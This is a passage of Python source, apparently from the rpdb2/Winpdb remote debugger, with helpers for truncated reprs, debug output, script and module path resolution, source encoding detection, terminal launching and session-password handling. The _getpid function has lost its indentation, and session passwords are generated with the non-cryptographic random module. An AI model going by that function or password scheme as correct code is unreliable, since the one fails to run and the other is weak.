        # attributes — result is best-effort, so flag it. TODO confirm.
        is_valid[0] = False
    return as_unicode(pattern % s)
def repr_dict(pattern, d, length, encoding, is_valid):
    """Render mapping *d* through *pattern* (e.g. '{%s}'), length-limited.

    Keys and values are rendered via repr_ltd(); is_valid[0] is cleared
    on truncation. Password-related keys are omitted entirely.
    """
    # Reserve room for the pattern's own decoration (all but the '%s').
    length = max(0, length - len(pattern) + 2)
    s = ''
    index = 0
    try:
        for k in d:
            #
            # Remove any trace of session password from data structures that
            # go over the network.
            #
            if type(k) == str and k in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
                continue
            v = d[k]
            s += repr_ltd(k, length - len(s), encoding, is_valid)
            # Budget check after the key alone, before rendering the value.
            if len(s) > length:
                is_valid[0] = False
                if not s.endswith('...'):
                    s += '...'
                break
            s += ': ' + repr_ltd(v, length - len(s), encoding, is_valid)
            index += 1
            if index < len(d) and len(s) > length:
                is_valid[0] = False
                if not s.endswith('...'):
                    s += '...'
                break
            if index < len(d):
                s += ', '
    except AttributeError:
        # Presumably raised by exotic mappings lacking expected
        # attributes — result is best-effort, so flag it. TODO confirm.
        is_valid[0] = False
    return as_unicode(pattern % s)
def repr_bytearray(s, length, encoding, is_valid):
    """Length-limited repr of a bytearray, decoded with *encoding* if possible."""
    try:
        text = s.decode(encoding)
        inner = repr_unicode(text, length, is_valid)
        return 'bytearray(b' + inner[1:] + ')'
    except:
        # Not decodable with the requested encoding: fall back to the
        # plain repr() based rendering.
        return repr_str_raw(s, length, is_valid)
def repr_bytes(s, length, encoding, is_valid):
    """Length-limited b'...' style repr of a bytes object."""
    try:
        text = s.decode(encoding)
        inner = repr_unicode(text, length, is_valid)
        return 'b' + inner[1:]
    except:
        # Not decodable with the requested encoding: fall back to the
        # plain repr() based rendering.
        return repr_str_raw(s, length, is_valid)
def repr_str8(s, length, encoding, is_valid):
    """Length-limited s'...' style repr of a str8 object (py3k alpha)."""
    try:
        text = s.decode(encoding)
        inner = repr_unicode(text, length, is_valid)
        return 's' + inner[1:]
    except:
        # Not decodable with the requested encoding: fall back to the
        # plain repr() based rendering.
        return repr_str_raw(s, length, is_valid)
def repr_str(s, length, encoding, is_valid):
    """Length-limited repr of a native str, decoded with *encoding*."""
    try:
        text = as_unicode(s, encoding, fstrict = True)
        inner = repr_unicode(text, length, is_valid)
        return inner[1:]
    except:
        # Not decodable with the requested encoding: fall back to the
        # plain repr() based rendering.
        return repr_str_raw(s, length, is_valid)
def repr_unicode(s, length, is_valid):
    """Build a u'...' style repr of text *s*, truncated to ~length chars.

    ASCII characters are escaped via repr(); non-ASCII characters are
    kept verbatim. is_valid[0] is cleared when truncation occurs.
    """
    # repr('x') is "'x'" on py3k but "u'x'" on py2: skip prefix + quote.
    skip = 1 if is_py3k() else 2
    out = ''
    for ch in s:
        if len(out) > length:
            is_valid[0] = False
            out += '...'
            break
        if ord(ch) < 128:
            out += repr(ch)[skip: -1]
        else:
            out += ch
    if "'" not in out:
        return as_unicode("u'%s'" % out)
    if '"' not in out:
        return as_unicode('u"%s"' % out)
    return as_unicode("u'%s'" % out.replace("'", "\\'"))
def repr_str_raw(s, length, is_valid):
    """repr() of a string clipped to *length*, flagging truncation."""
    ellipsis = ELLIPSIS_UNICODE if is_unicode(s) else ELLIPSIS_BYTES
    if len(s) > length:
        is_valid[0] = False
        s = s[: length] + ellipsis
    return as_unicode(repr(s))
def repr_base(v, length, is_valid):
    """repr() of a primitive value, clipped to *length* characters."""
    text = repr(v)
    if len(text) <= length:
        return as_unicode(text)
    is_valid[0] = False
    return as_unicode(text[: length] + '...')
def repr_ltd(x, length, encoding, is_valid = None):
    """Return a length-limited unicode repr() of an arbitrary object.

    length:   approximate maximum length of the result.
    encoding: encoding used for byte strings (ENCODING_RAW_I for raw).
    is_valid: optional single-element list used as an out-parameter;
              is_valid[0] is set to False when the output was truncated
              or is only approximate.

    Never raises; falls back to 'N/A' on unexpected errors.
    """
    # Fix: the default used to be the mutable literal [True], which is
    # shared between calls and stays False forever once any defaulted
    # call truncates. Create a fresh list per call instead.
    if is_valid is None:
        is_valid = [True]
    try:
        length = max(0, length)
        # frozenset/set do not exist on very old interpreters.
        try:
            if isinstance(x, frozenset):
                return repr_list('frozenset([%s])', x, length, encoding, is_valid)
            if isinstance(x, set):
                return repr_list('set([%s])', x, length, encoding, is_valid)
        except NameError:
            pass
        if isinstance(x, sets.Set):
            return repr_list('sets.Set([%s])', x, length, encoding, is_valid)
        if isinstance(x, sets.ImmutableSet):
            return repr_list('sets.ImmutableSet([%s])', x, length, encoding, is_valid)
        if isinstance(x, list):
            return repr_list('[%s]', x, length, encoding, is_valid)
        if isinstance(x, tuple):
            return repr_list('(%s)', x, length, encoding, is_valid)
        if isinstance(x, dict):
            return repr_dict('{%s}', x, length, encoding, is_valid)
        # Raw mode: render any string-like object without decoding.
        if encoding == ENCODING_RAW_I and [True for t in [str, unicode, bytearray, bytes, str8] if t is type(x)]:
            return repr_str_raw(x, length, is_valid)
        if type(x) is unicode:
            return repr_unicode(x, length, is_valid)
        if type(x) is bytearray:
            return repr_bytearray(x, length, encoding, is_valid)
        if type(x) is bytes:
            return repr_bytes(x, length, encoding, is_valid)
        if type(x) is str8:
            return repr_str8(x, length, encoding, is_valid)
        if type(x) is str:
            return repr_str(x, length, encoding, is_valid)
        if [True for t in [bool, int, float, long, type(None)] if t is type(x)]:
            return repr_base(x, length, is_valid)
        # Arbitrary object: clip its repr() and mark the result approximate.
        is_valid[0] = False
        y = safe_repr(x)[: length]
        if len(y) == length:
            y += '...'
        if encoding == ENCODING_RAW_I:
            encoding = 'utf-8'
        try:
            y = as_unicode(y, encoding, fstrict = True)
            return y
        except:
            pass
        encoding = sys.getfilesystemencoding()
        y = as_unicode(y, encoding)
        return y
    except:
        print_debug_exception()
        return as_unicode('N/A')
def print_debug(_str):
    """Emit a timestamped debug line to the real stderr when g_fDebug is on.

    The caller's file, line and function are taken from one frame up.
    """
    if not g_fDebug:
        return
    now = time.time()
    local = time.localtime(now)
    stamp = time.strftime('%H:%M:%S', local) + '.%03d' % ((now - int(now)) * 1000)
    caller = sys._getframe(1)
    filename = os.path.basename(caller.f_code.co_filename)
    lineno = caller.f_lineno
    funcname = caller.f_code.co_name
    line = '%s %s:%d in %s: %s' % (stamp, filename, lineno, funcname, _str)
    _print(line, sys.__stderr__)
def print_debug_exception(fForce = False):
    """Print the current exception to stderr when in debug mode.

    fForce: print even when g_fDebug is off.
    """
    if not g_fDebug and not fForce:
        return
    t, v, tb = sys.exc_info()
    print_exception(t, v, tb, fForce)
class CFileWrapper:
    """File-like proxy whose write() goes through _print() for re-encoding.

    Every other attribute access is forwarded to the wrapped file object.
    """
    def __init__(self, f):
        # The wrapped file-like object.
        self.m_f = f
    def write(self, s):
        # Route through _print() so the text is re-encoded to the
        # target file's encoding (no extra newline appended).
        _print(s, self.m_f, feol = False)
    def __getattr__(self, name):
        # Fix: forward via getattr(). The wrapped object need not define
        # a __getattr__ of its own (file objects generally do not), so
        # the previous self.m_f.__getattr__(name) raised AttributeError
        # even for perfectly valid attributes such as flush.
        return getattr(self.m_f, name)
def print_exception(t, v, tb, fForce = False):
    """Print the given exception to stderr when in debug mode (or fForce).

    Serialized with g_traceback_lock so output from concurrent threads
    does not interleave.
    """
    if not g_fDebug and not fForce:
        return
    try:
        g_traceback_lock.acquire()
        traceback.print_exception(t, v, tb, file = CFileWrapper(sys.stderr))
    finally:
        g_traceback_lock.release()
def print_stack():
    """Print the current thread's stack to stderr when in debug mode."""
    if g_fDebug != True:
        return
    try:
        g_traceback_lock.acquire()
        traceback.print_stack(file = CFileWrapper(sys.stderr))
    finally:
        g_traceback_lock.release()
#
# myisfile() is similar to os.path.isfile() but also works with
# Python eggs.
#
def myisfile(path):
    """Like os.path.isfile() but also true for files inside Python eggs."""
    try:
        mygetfile(path, False)
    except:
        return False
    return True
#
# Read a file even if inside a Python egg.
#
def mygetfile(path, fread_file = True):
    """Read *path*, looking inside zip archives (Python eggs) when needed.

    path:       file path, possibly pointing inside a zip archive.
    fread_file: when False only verify the file is readable; returns
                None for a plain file in that case.

    Returns the file contents (bytes; text on OpenVMS).
    Raises IOError when the file cannot be located or read.
    """
    if os.path.isfile(path):
        if not fread_file:
            return
        if sys.platform == 'OpenVMS':
            #
            # OpenVMS filesystem does not support byte stream.
            #
            mode = 'r'
        else:
            mode = 'rb'
        # Fix: close the handle even when read() raises; the original
        # leaked the descriptor on a read error.
        f = open(path, mode)
        try:
            data = f.read()
        finally:
            f.close()
        return data
    #
    # Not a plain file: walk up to the nearest existing ancestor and
    # treat it as a zip archive containing the remainder of the path.
    #
    d = os.path.dirname(path)
    while True:
        if os.path.exists(d):
            break
        _d = os.path.dirname(d)
        if _d in [d, '']:
            raise IOError
        d = _d
    if not zipfile.is_zipfile(d):
        raise IOError
    z = zipimport.zipimporter(d)
    try:
        data = z.get_data(path[len(d) + 1:])
        return data
    except:
        raise IOError
def split_command_line_path_filename_args(command_line):
    """Split a command line into a (path, filename, args) 3-tuple.

    Handles an existing-file path, a quoted script name, or the first
    whitespace-delimited token as the script.
    """
    command_line = command_line.strip()
    if not command_line:
        return ('', '', '')
    if myisfile(command_line):
        (_path, _filename) = split_path(command_line)
        return (_path, _filename, '')
    quote = command_line[0]
    if quote in ['"', "'"]:
        rest = command_line[1:]
        end = rest.find(quote)
        if end == -1:
            (_path, filename) = split_path(rest)
            return (_path, filename, '')
        (_path, filename) = split_path(rest[: end])
        args = rest[end + 1:].strip()
        return (_path, filename, args)
    space = command_line.find(' ')
    if space == -1:
        (_path, filename) = split_path(command_line)
        return (_path, filename, '')
    args = command_line[space + 1:].strip()
    (_path, filename) = split_path(command_line[: space])
    return (_path, filename, args)
def split_path(path):
    """os.path.split() variant that keeps a trailing separator on the head.

    If the separator between head and tail was present in *path*, it is
    re-appended to the returned head part.
    """
    (_path, filename) = os.path.split(path)
    seps = [os.path.sep, os.path.altsep]
    cut = path[len(_path): len(_path) + 1]
    if _path[-1:] not in seps and cut in seps:
        _path += cut
    return (_path, filename)
def my_os_path_join(dirname, basename):
    """os.path.join() that tolerates mixed str/unicode parts on py2."""
    if is_py3k() or (type(dirname) == str and type(basename) == str):
        return os.path.join(dirname, basename)
    fs_encoding = sys.getfilesystemencoding()
    if type(dirname) == str:
        dirname = dirname.decode(fs_encoding)
    if type(basename) == str:
        basename = basename.decode(fs_encoding)
    return os.path.join(dirname, basename)
def calc_frame_path(frame):
    """Compute and cache a canonical (lowered, absolute) path for *frame*.

    Resolution order: the code object's co_filename, repaired via the
    module's __file__ when co_filename is a pseudo name like '<string>';
    successful resolutions are memoized in g_frames_path keyed by the
    (possibly repaired) filename.
    """
    globals_filename = frame.f_globals.get('__file__', None)
    filename = frame.f_code.co_filename
    if filename.startswith('<'):
        # Pseudo filename (e.g. '<string>'): fall back to the module file,
        # or give up and return the pseudo name unchanged.
        if globals_filename == None:
            return filename
        else:
            filename = CalcScriptName(os.path.basename(globals_filename))
    if filename in g_frames_path:
        return g_frames_path[filename]
    if globals_filename != None:
        # Try the module's own directory first.
        dirname = os.path.dirname(globals_filename)
        basename = os.path.basename(filename)
        path = my_os_path_join(dirname, basename)
        if os.path.isabs(path):
            abspath = my_abspath(path)
            lowered = winlower(abspath)
            g_frames_path[filename] = lowered
            return lowered
        try:
            abspath = FindFile(path, fModules = True)
            lowered = winlower(abspath)
            g_frames_path[filename] = lowered
            return lowered
        except IOError:
            pass
    if os.path.isabs(filename):
        abspath = my_abspath(filename)
        lowered = winlower(abspath)
        g_frames_path[filename] = lowered
        return lowered
    try:
        abspath = FindFile(filename, fModules = True)
        lowered = winlower(abspath)
        g_frames_path[filename] = lowered
        return lowered
    except IOError:
        # Unresolvable: return a lowered form without caching it.
        lowered = winlower(filename)
        return lowered
def my_abspath(path):
    """os.path.abspath() replacement that is safe to call while tracing.

    The stock nt implementation imports modules lazily, which can
    deadlock the debugger; on nt my_abspath1() is used instead.
    Pseudo-paths such as '<stdin>' are returned untouched.
    """
    if path.startswith('<'):
        return path
    if os.name == 'nt':
        return my_abspath1(path)
    return os.path.abspath(path)
#
# MOD
#
def my_abspath1(path):
    """ntpath.abspath() clone that avoids lazy imports (nt only).

    Relies on _getfullpathname/getcwd/getcwdu having been imported at
    module level on Windows.
    """
    if path:
        try:
            path = _getfullpathname(path)
        except WindowsError:
            pass
    else:
        try:
            path = getcwd()
        except UnicodeDecodeError:
            #
            # This exception can be raised in py3k (alpha) on nt.
            #
            path = getcwdu()
    normalized = os.path.normpath(path)
    # Normalize the drive letter to upper case, e.g. c:\x -> C:\x.
    if len(normalized) >= 2 and normalized[1:2] == ':':
        normalized = normalized[:1].upper() + normalized[1:]
    return normalized
def IsPythonSourceFile(path):
    """
    Heuristically decide whether *path* is Python source: by extension,
    by a '#!...python' shebang in the first lines, or (Python 2 only)
    by actually parsing the file with the compiler module.
    """
    if path.endswith(PYTHON_FILE_EXTENSION):
        return True

    if path.endswith(PYTHONW_FILE_EXTENSION):
        return True

    # Map back a '?'-mangled name to its original unicode path.
    path = g_found_unicode_files.get(path, path)

    for lineno in range(1, 10):
        line = get_source_line(path, lineno)
        if line.startswith('#!') and 'python' in line:
            return True

    if is_py3k():
        #
        # py3k does not have compiler.parseFile, so return
        # True anyway...
        #
        return True

    try:
        compiler.parseFile(path)
        return True
    except:
        # Any parse failure means "not Python source".
        return False
def CalcModuleName(filename):
    """
    Return the module name implied by *filename*: the basename with a
    recognized Python extension stripped, else the basename itself.
    """
    base = os.path.basename(filename)
    (stem, ext) = os.path.splitext(base)

    return stem if ext in PYTHON_EXT_LIST else base
def CalcScriptName(filename, fAllowAnyExt = True):
    """
    Map *filename* to a source script name: .py/.pyw pass through,
    compiled-extension names are rewritten to .py, .pyc/.pyo lose the
    trailing character, and anything else either passes through
    (fAllowAnyExt) or gets the .py extension appended.
    """
    for known_ext in (PYTHON_FILE_EXTENSION, PYTHONW_FILE_EXTENSION):
        if filename.endswith(known_ext):
            return filename

    if filename.endswith(PYTHONW_SO_EXTENSION):
        return filename[:-3] + PYTHON_FILE_EXTENSION

    # .pyc / .pyo: drop the trailing character to get the .py name.
    if filename[:-1].endswith(PYTHON_FILE_EXTENSION):
        return filename[:-1]

    if fAllowAnyExt:
        return filename

    return filename + PYTHON_FILE_EXTENSION
def FindModuleDir(module_name):
    """
    Return the (absolute, NT-lowered) directory of the named loaded
    module. Modules lacking a usable __file__ are located relative to
    their parent package, recursively. Raises IOError for ''.
    """
    if module_name == '':
        raise IOError

    # Split 'pkg.sub' into parent 'pkg' and child 'sub'.
    dot_index = module_name.rfind('.')
    if dot_index != -1:
        parent = module_name[: dot_index]
        child = module_name[dot_index + 1:]
    else:
        parent = ''
        child = module_name

    m = sys.modules[module_name]

    if not hasattr(m, '__file__') or m.__file__ == None:
        # Builtin/namespace-like module: derive from parent package dir.
        parent_dir = FindModuleDir(parent)
        module_dir = my_os_path_join(parent_dir, winlower(child))
        return module_dir

    if not os.path.isabs(m.__file__):
        # Relative __file__ is unreliable; derive from parent instead.
        parent_dir = FindModuleDir(parent)
        module_dir = my_os_path_join(parent_dir, winlower(child))
        return module_dir

    (root, ext) = os.path.splitext(m.__file__)
    if root.endswith('__init__'):
        # A package: its directory is the one holding __init__.
        root = os.path.dirname(root)

    abspath = my_abspath(root)
    lowered = winlower(abspath)

    return lowered
def FindFileAsModule(filename):
    """
    Resolve *filename* to an on-disk source path by matching it against
    modules currently loaded in sys.modules. Raises IOError when no
    loaded module corresponds to it.
    """
    lowered = winlower(filename)
    (root, ext) = os.path.splitext(lowered)

    # Convert path separators/drive colon to dots for module matching.
    root_dotted = root.replace('\\', '.').replace('/', '.').replace(':', '.')

    match_list = []
    for (module_name, m) in list(sys.modules.items()):
        lowered_module_name = winlower(module_name)
        if (root_dotted + '.').startswith(lowered_module_name + '.'):
            match_list.append((len(module_name), module_name))

            if lowered_module_name == root_dotted:
                # Exact match; no longer prefix can exist.
                break

    # Try the longest (most specific) matching module first.
    match_list.sort()
    match_list.reverse()

    for (matched_len, matched_module) in match_list:
        try:
            module_dir = FindModuleDir(matched_module)
        except IOError:
            continue

        suffix = root[matched_len:]
        if suffix == '':
            path = module_dir + ext
        else:
            path = my_os_path_join(module_dir, suffix.strip('\\')) + ext

        scriptname = CalcScriptName(path, fAllowAnyExt = False)
        if myisfile(scriptname):
            return scriptname

        #
        # Check .pyw files
        #
        scriptname += 'w'
        if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
            return scriptname

    raise IOError
def getcwd():
    """os.getcwd() wrapper that logs a UnicodeDecodeError before re-raising it."""
    try:
        cwd = os.getcwd()
    except UnicodeDecodeError:
        print_debug_exception(True)
        raise

    return cwd
def getcwdu():
    """
    Return the current working directory as unicode: os.getcwdu() on
    Python 2, falling back to getcwd() where it does not exist.
    """
    getter = getattr(os, 'getcwdu', None)
    if getter is not None:
        return getter()

    return getcwd()
def FindFile(
        filename,
        sources_paths = [],
        fModules = False,
        fAllowAnyExt = True
        ):

    """
    FindFile looks for the full path of a script in a rather non-strict
    and human like behavior.

    ENCODING:
    filename should be either Unicode or encoded with sys.getfilesystemencoding()!
    Returned value is encoded with sys.getfilesystemencoding().

    It will always look for .py or .pyw files even if a .pyc or no
    extension is given.

    1. It will check against loaded modules if asked.
    1. full path (if exists).
    2. sources_paths.
    2. current path.
    3. PYTHONPATH
    4. PATH

    NOTE: the mutable default for sources_paths is harmless here since
    it is only read, never mutated.
    """
    if filename in g_found_unicode_files:
        return filename

    if filename.startswith('<'):
        # Pseudo filenames never exist on disk.
        raise IOError

    filename = filename.strip('\'"')
    filename = os.path.expanduser(filename)

    if fModules and not (os.path.isabs(filename) or filename.startswith('.')):
        try:
            return winlower(FindFileAsModule(filename))
        except IOError:
            pass

    if fAllowAnyExt:
        # Prefer an exact .py/.pyw match before accepting any extension.
        try:
            abspath = FindFile(
                        filename,
                        sources_paths,
                        fModules = False,
                        fAllowAnyExt = False
                        )
            return abspath
        except IOError:
            pass

    if os.path.isabs(filename) or filename.startswith('.'):
        try:
            scriptname = None

            abspath = my_abspath(filename)
            lowered = winlower(abspath)
            scriptname = CalcScriptName(lowered, fAllowAnyExt)

            if myisfile(scriptname):
                return scriptname

            #
            # Check .pyw files
            #
            scriptname += 'w'
            if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
                return scriptname

            scriptname = None
            raise IOError

        finally:
            # Python 2: map unicode results that do not survive the
            # filesystem encoding through g_found_unicode_files. Note the
            # 'return' in this finally clause overrides the IOError above.
            if not is_py3k() and is_unicode(scriptname):
                fse = sys.getfilesystemencoding()
                _l = as_string(scriptname, fse)
                if '?' in _l:
                    g_found_unicode_files[_l] = scriptname
                return _l

    scriptname = CalcScriptName(filename, fAllowAnyExt)

    try:
        cwd = [getcwd(), getcwdu()]
    except UnicodeDecodeError:
        #
        # This exception can be raised in py3k (alpha) on nt.
        #
        cwd = [getcwdu()]

    env_path = os.environ['PATH']
    paths = sources_paths + cwd + g_initial_cwd + sys.path + env_path.split(os.pathsep)

    try:
        lowered = None

        for p in paths:
            f = my_os_path_join(p, scriptname)
            abspath = my_abspath(f)
            lowered = winlower(abspath)

            if myisfile(lowered):
                return lowered

            #
            # Check .pyw files
            #
            lowered += 'w'
            if lowered.endswith(PYTHONW_FILE_EXTENSION) and myisfile(lowered):
                return lowered

        lowered = None
        raise IOError

    finally:
        # Same unicode-path bookkeeping as above (and same 'return' in
        # finally behavior).
        if not is_py3k() and is_unicode(lowered):
            fse = sys.getfilesystemencoding()
            _l = as_string(lowered, fse)
            if '?' in _l:
                g_found_unicode_files[_l] = lowered
            return _l
def IsFileInPath(filename):
    """Return True when FindFile() can locate *filename*, False otherwise."""
    if filename == '':
        return False

    try:
        FindFile(filename)
    except IOError:
        return False

    return True
def IsPrefixInEnviron(_str):
    """Return True if any environment variable name starts with *_str*."""
    return any(name.startswith(_str) for name in os.environ.keys())
def CalcTerminalCommand():
    """
    Calc the unix command to start a new terminal, for example: xterm

    Preference order: $RPDBTERM, $COLORTERM, the desktop default
    (KDE query / gnome-terminal), then xterm, then rxvt.
    Raises SpawnUnsupported when nothing usable is found.
    """
    if RPDBTERM in os.environ:
        term = os.environ[RPDBTERM]
        if IsFileInPath(term):
            return term

    if COLORTERM in os.environ:
        term = os.environ[COLORTERM]
        if IsFileInPath(term):
            return term

    if IsPrefixInEnviron(KDE_PREFIX):
        # Ask KDE for its configured terminal (py2 'commands' module).
        (s, term) = commands.getstatusoutput(KDE_DEFAULT_TERM_QUERY)
        if (s == 0) and IsFileInPath(term):
            return term

    elif IsPrefixInEnviron(GNOME_PREFIX):
        if IsFileInPath(GNOME_DEFAULT_TERM):
            return GNOME_DEFAULT_TERM

    if IsFileInPath(XTERM):
        return XTERM

    if IsFileInPath(RXVT):
        return RXVT

    raise SpawnUnsupported
def CalcMacTerminalCommand(command):
    """
    Wrap *command* in an osascript invocation that runs it inside the
    macOS Terminal application.

    Quoting happens in three steps: escape for an AppleScript
    double-quoted string, embed into the AppleScript statement, then
    escape for the shell's single-quoted argument.
    """
    # AppleScript string: backslash-escape backslashes and double quotes.
    escaped = command.replace('\\', '\\\\').replace('"', '\\"')

    # Complete AppleScript statement.
    script = 'tell application "Terminal" to do script "%s"' % escaped

    # Shell single-quoted string: close, insert escaped quote, reopen.
    script = script.replace("'", "'\\''")

    return "osascript -e '%s'" % script
def winlower(path):
    """
    Normalize *path* for comparison: lowercased on NT (whose filesystems
    are case-insensitive), returned unchanged on other systems.
    """
    return path.lower() if os.name == 'nt' else path
def source_provider_blender(filename):
    """
    Return source code of the file referred by filename.

    Support for debugging of Blender Python scripts.
    Blender scripts are not always saved on disk, and their
    source has to be queried directly from the Blender API.
    http://www.blender.org
    """
    if not 'Blender.Text' in sys.modules:
        # Not running inside Blender; let other providers try.
        raise IOError

    if filename.startswith('<'):
        #
        # This specifies blender source whose source is not
        # available.
        #
        raise IOError(BLENDER_SOURCE_NOT_AVAILABLE)

    _filename = os.path.basename(filename)

    try:
        t = sys.modules['Blender.Text'].get(_filename)
        lines = t.asLines()
        return '\n'.join(lines) + '\n'

    except NameError:
        # Exact-name lookup failed; fall back to a case-normalized scan.
        f = winlower(_filename)
        tlist = sys.modules['Blender.Text'].get()

        t = None
        for _t in tlist:
            n = winlower(_t.getName())
            if n == f:
                t = _t
                break

        if t == None:
            #
            # filename does not specify a blender file. Raise IOError
            # so that search can continue on file system.
            #
            raise IOError

        lines = t.asLines()
        return '\n'.join(lines) + '\n'
def source_provider_filesystem(filename):
    """Return the raw contents of *filename*, minus any leading UTF-8 BOM."""
    data = mygetfile(filename)

    has_bom = data[:3] == as_bytes(ENCODING_UTF8_PREFIX_1)
    return data[3:] if has_bom else data
def source_provider(filename):
    """
    Load source for *filename*, trying the auxiliary provider, then
    Blender, then the filesystem. Returns (unicode_source, encoding,
    ffilesystem) where ffilesystem marks a plain file on disk.
    """
    source = None
    ffilesystem = False

    try:
        if g_source_provider_aux != None:
            source = g_source_provider_aux(filename)
    except IOError:
        v = sys.exc_info()[1]
        # 'Source not available' is final; other IOErrors fall through
        # to the next provider.
        if SOURCE_NOT_AVAILABLE in v.args:
            raise

    try:
        if source == None:
            source = source_provider_blender(filename)
    except IOError:
        v = sys.exc_info()[1]
        if BLENDER_SOURCE_NOT_AVAILABLE in v.args:
            raise

    if source == None:
        source = source_provider_filesystem(filename)
        ffilesystem = True

    encoding = ParseEncoding(source)

    if not is_unicode(source):
        source = as_unicode(source, encoding)

    return source, encoding, ffilesystem
def lines_cache(filename):
    """
    Return (lines, encoding, ffilesystem) for *filename*, memoizing the
    newline-normalized, split source in g_lines_cache.
    """
    filename = g_found_unicode_files.get(filename, filename)

    cached = g_lines_cache.get(filename)
    if cached is not None:
        return cached

    (source, encoding, ffilesystem) = source_provider(filename)
    normalized = source.replace(as_unicode('\r\n'), as_unicode('\n'))

    entry = (normalized.split(as_unicode('\n')), encoding, ffilesystem)
    g_lines_cache[filename] = entry

    return entry
def get_source(filename):
    """Return (source, encoding) for *filename*, rejoined with '\\n'."""
    (lines, encoding, _ffilesystem) = lines_cache(filename)

    return (as_unicode('\n').join(lines), encoding)
def get_source_line(filename, lineno):
    """
    Return line *lineno* (1-based) of *filename* with a trailing
    newline, or the empty unicode string past end of file.
    """
    (lines, _encoding, _ffilesystem) = lines_cache(filename)

    if lineno > len(lines):
        return as_unicode('')

    return lines[lineno - 1] + as_unicode('\n')
def is_provider_filesystem(filename):
    """
    Return True when *filename*'s source comes from the filesystem, or
    when lookup failed for any reason other than an explicit
    'source not available' marker from a provider.
    """
    try:
        (lines, encoding, ffilesystem) = lines_cache(filename)
        return ffilesystem

    except IOError:
        v = sys.exc_info()[1]
        return not (BLENDER_SOURCE_NOT_AVAILABLE in v.args or SOURCE_NOT_AVAILABLE in v.args)
def get_file_encoding(filename):
    """Return the source encoding recorded for *filename* by lines_cache()."""
    return lines_cache(filename)[1]
def ParseLineEncoding(l):
    """
    Extract an encoding name from a single source line, recognizing the
    emacs '# -*- coding: <name>' and vim '# vim:fileencoding=<name>'
    declaration forms. Return None when the line declares no encoding.
    """
    emacs_prefix = '# -*- coding: '
    if l.startswith(emacs_prefix):
        return l[len(emacs_prefix):].split()[0]

    vim_prefix = '# vim:fileencoding='
    if l.startswith(vim_prefix):
        return l[len(vim_prefix):].strip()

    return None
def ParseEncoding(txt):
    """
    Parse document encoding according to:
    http://docs.python.org/ref/encodings.html

    Scans the first lines for a declaration; returns 'utf-8' when none
    is found or the declared codec is unknown.
    """
    eol = '\n'
    if not is_unicode(txt):
        eol = as_bytes('\n')

    # Only the first 20 complete lines are considered; the remainder
    # (last split element) is dropped.
    l = txt.split(eol, 20)[:-1]

    for line in l:
        line = as_unicode(line)
        encoding = ParseLineEncoding(line)
        if encoding is not None:
            try:
                # Accept only codecs Python actually knows.
                codecs.lookup(encoding)
                return encoding
            except:
                return 'utf-8'

    return 'utf-8'
def _getpid():
try:
return os.getpid()
except:
return -1
def calcURL(host, port):
    """
    Form HTTP URL from 'host' and 'port' arguments.
    """
    return 'http://%s:%s' % (str(host), str(port))
def GetSocketError(e):
    """Return the errno element of *e*.args, or -1 when args is not a non-empty tuple."""
    if isinstance(e.args, tuple) and len(e.args) > 0:
        return e.args[0]

    return -1
def ControlRate(t_last_call, max_rate):
    """
    Throttle the caller to at most *max_rate* invocations per second by
    sleeping off the remainder of the interval since *t_last_call*.
    Returns the time measured on entry (before any sleep).
    """
    interval = 1.0 / max_rate
    now = time.time()

    elapsed = now - t_last_call
    if elapsed < interval:
        time.sleep(interval - elapsed)

    return now
def generate_rid():
    """
    Return a 7 digits random id.
    """
    return as_unicode(repr(random.randint(1000000, 9999999)))
def generate_random_char(_str):
    """
    Return a random character from string argument ('' for an empty
    string).
    """
    if _str == '':
        return ''

    return _str[random.randint(0, len(_str) - 1)]
def generate_random_password():
    """
    Generate an 8 characters long password: first character alphabetic,
    the rest letters, digits or underscore. Visually ambiguous
    characters are deliberately absent from the alphabets.
    """
    letters = 'abdefghijmnqrt' + 'ABDEFGHJLMNQRTY'
    alphabet = '23456789_' + letters

    chars = [generate_random_char(letters)]
    for _ in range(7):
        chars.append(generate_random_char(alphabet))

    return as_unicode(''.join(chars))
def is_valid_pwd(_rpdb2_pwd):
    """
    Validate a password: non-empty, ASCII-encodable, and composed only
    of alphanumerics and underscores.
    """
    if _rpdb2_pwd in [None, '']:
        return False

    try:
        # Normalize to unicode (Python 2 byte strings) and confirm the
        # password round-trips through ASCII.
        if not is_unicode(_rpdb2_pwd):
            _rpdb2_pwd = _rpdb2_pwd.decode('ascii')

        _rpdb2_pwd.encode('ascii')

    except:
        return False

    for c in _rpdb2_pwd:
        if c.isalnum():
            continue

        if c == '_':
            continue

        return False

    return True
def is_encryption_supported():
    """
    Is the Crypto module imported/available.
    """
    # 'DES' appears in the module namespace only when the optional
    # pycrypto import at the top of the file succeeded.
    return 'DES' in globals()
def calc_suffix(_str, n):
    """
    Return an n charaters suffix of the argument string of the form
    '...suffix'; strings that already fit are returned unchanged.
    """
    if len(_str) > n:
        return '...' + _str[3 - n:]

    return _str
def calc_prefix(_str, n):
    """
    Return an n charaters prefix of the argument string of the form
    'prefix...'; strings that already fit are returned unchanged.
    """
    if len(_str) > n:
        return _str[: (n - 3)] + '...'

    return _str
def create_rpdb_settings_folder():
    """
    Create the settings folder on Posix systems:
    '~/.rpdb2_settings' with mode 700.

    The password and breakpoint sub-folders are created too, all 0700
    since they hold per-user secrets.
    """
    if os.name != POSIX:
        return

    home = os.path.expanduser('~')

    rsf = os.path.join(home, RPDB_SETTINGS_FOLDER)
    if not os.path.exists(rsf):
        os.mkdir(rsf, int('0700', 8))

    pwds = os.path.join(home, RPDB_PWD_FOLDER)
    if not os.path.exists(pwds):
        os.mkdir(pwds, int('0700', 8))

    bpl = os.path.join(home, RPDB_BPL_FOLDER)
    if not os.path.exists(bpl):
        os.mkdir(bpl, int('0700', 8))
def cleanup_bpl_folder(path):
    """
    Occasionally (about 1 call in 11) trim the breakpoint-list folder to
    MAX_BPL_FILES entries, removing the least recently accessed files.
    Failures are ignored - this is purely best-effort housekeeping.
    """
    if random.randint(0, 10) > 0:
        return

    l = os.listdir(path)
    if len(l) < MAX_BPL_FILES:
        return

    try:
        # Pair each file with its access time for age-based sorting.
        ll = [(os.stat(os.path.join(path, f))[stat.ST_ATIME], f) for f in l]
    except:
        return

    ll.sort()

    # Remove everything but the newest MAX_BPL_FILES entries.
    for (t, f) in ll[: -MAX_BPL_FILES]:
        try:
            os.remove(os.path.join(path, f))
        except:
            pass
def calc_bpl_filename(filename):
    """
